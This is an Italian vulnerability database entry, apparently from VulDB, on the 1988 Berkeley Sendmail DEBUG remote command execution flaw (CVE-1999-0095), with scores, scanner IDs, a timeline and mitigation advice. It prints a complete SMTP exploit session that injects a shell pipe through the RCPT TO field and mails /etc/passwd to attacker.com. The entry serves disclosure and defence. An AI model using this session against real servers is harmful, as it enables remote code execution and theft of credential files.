Berkeley Sendmail fino 5.58 DEBUG escalazione di privilegi

CVSS Punteggio Meta TempExploit Prezzo Attuale (≈)Punteggio di interesse CTI
9.4$0-$5k0.00

Una vulnerabilità di livello estremamente critico è stata rilevata in Berkeley Sendmail fino 5.58 (Mail Server Software). É interessato una funzione sconosciuta del componente DEBUG Handler. Attraverso la manipolazione di un input sconosciuto se causa una vulnerabilità di classe escalazione di privilegi. Gli effetti sono noti per riservatezza, integrità e disponibilità.

La vulnerabilità è stata pubblicata in data 07/11/1988 con identificazione CA-1988-01 con un advisory (CERT.org) (confermato). L'advisory è scaricabile da cert.org. Questa vulnerabilità è identificata come CVE-1999-0095. L'attacco può avvenire nella rete. L'utilizzo non richiede alcuna forma di autentificazione. Non sono conosciuti dettagli tecnici ma un pubblico metodo di utilizzo è disponibile. La vulnerabilità risulta storicamente interessante per come è stata sviluppata.

Un metodo di utilizzo è stato sviluppato in SMTP ed è stata pubblicata già prima e non dopo il comunicato. L'exploit è scaricabile da exploit-db.com. È stato dichiarato come altamente funzionale. Per almeno 61 giorni, questa vulnerabilità è stata classificata come 0-day exploit. È disponibile un plugin per lo scanner Nessus, numero ID 10247 (Sendmail DEBUG/WIZ Remote Command Execution), che può aiutare a determinare l'esistenza della criticità nel sistema analizzato. Il codice utilizzato dal exploit è:

220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from: </dev/null>
250 OK
rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0">
250 OK
data
354 Start mail input; end with <CRLF>.<CRLF>
mail evil@attacker.com </etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating

L'aggiornamento alla versione 5.59 elimina questa vulnerabilità. È possibile attenuare l'effetto del problema mediante l'utilizzo Disable Debug. Il miglior modo suggerito per attenuare il problema è aggiornamento all'ultima versione.

La vulnerabilità è documentata anche nel database X-Force (125), Tenable (10247) e Exploit-DB (19028).

Prodottoinfo

Genere

Fornitore

Nome

Versione

Licenza

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍

CVSSv3info

VulDB Punteggio meta-base: 9.8
VulDB Punteggio Meta Temp: 9.4

VulDB Punteggio di base: 9.8
VulDB Punteggio temporaneo: 9.4
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VettoreComplessitàAutenticazioneRiservatezzaIntegritàDisponibilità
sbloccaresbloccaresbloccaresbloccaresbloccaresbloccare
sbloccaresbloccaresbloccaresbloccaresbloccaresbloccare
sbloccaresbloccaresbloccaresbloccaresbloccaresbloccare

VulDB Punteggio di base: 🔍
VulDB Punteggio temporaneo: 🔍
VulDB Affidabilità: 🔍

NVD Punteggio di base: 🔍

Exploitinginfo

Classe: Escalazione di privilegi
CWE: CWE-269 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍

Locale: No
Remoto: Si

Disponibilità: 🔍
Accesso: Pubblico
Stato: Altamente funzionale
Linguaggio Di Programmazione: 🔍
Scaricamento: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Previsione dei prezzi: 🔍
Preventivo attuale: 🔍

0-Daysbloccaresbloccaresbloccaresbloccare
Oggisbloccaresbloccaresbloccaresbloccare

Nessus ID: 10247
Nessus Nome: Sendmail DEBUG/WIZ Remote Command Execution
Nessus File: 🔍
Nessus Rischio: 🔍
Nessus Family: 🔍
Nessus Context: 🔍

OpenVAS ID: 10247
OpenVAS Nome: Sendmail DEBUG
OpenVAS File: 🔍
OpenVAS Family: 🔍

Exploit-DB: 🔍

Intelligence Sulle Minacceinfo

Interesse: 🔍
Attori Attivi: 🔍
Gruppi APT attivi: 🔍

Contromisureinfo

Raccomandazione: Upgrade
Stato: 🔍

0 giorni di tempo: 🔍

Upgrade: Sendmail 5.59
Config: Disable Debug

Snort ID: 663
Snort Message: SERVER-MAIL Sendmail rcpt to command attempt
Snort Classe: 🔍
SourceFire IPS: 🔍
ISS Proventia IPS: 🔍

Sequenza temporaleinfo

01/08/1988 🔍
01/08/1988 +0 giorni 🔍
01/10/1988 +61 giorni 🔍
01/10/1988 +0 giorni 🔍
07/11/1988 +37 giorni 🔍
22/08/1999 +3940 giorni 🔍
12/09/2002 +1117 giorni 🔍
23/10/2002 +40 giorni 🔍
16/06/2014 +4254 giorni 🔍
07/05/2019 +1786 giorni 🔍

Fontiinfo

Advisory: CA-1988-01
Stato: Confermato

CVE: CVE-1999-0095 (🔍)
X-Force: 125
Vulnerability Center: 209 - SendMail Debug Allows Command Execution, High
SecurityFocus: 1 - Berkeley Sendmail DEBUG Vulnerability
OSVDB: 195 - Sendmail debug Arbitrary Command Execution

scip Labs: https://www.scip.ch/en/?labs.20161013
Vedi anche: 🔍

Voceinfo

Data di creazione: 16/06/2014 14:34
Aggiornamenti: 07/05/2019 10:51
I cambiamenti: 16/06/2014 14:34 (82), 07/05/2019 10:51 (9)
Completa: 🔍
Cache ID: 3:903:103

Discussione

Ancora nessun commento. Le Lingue: it + en.

Effettua il login per commentare.

Might our Artificial Intelligence support you?

Check our Alexa App!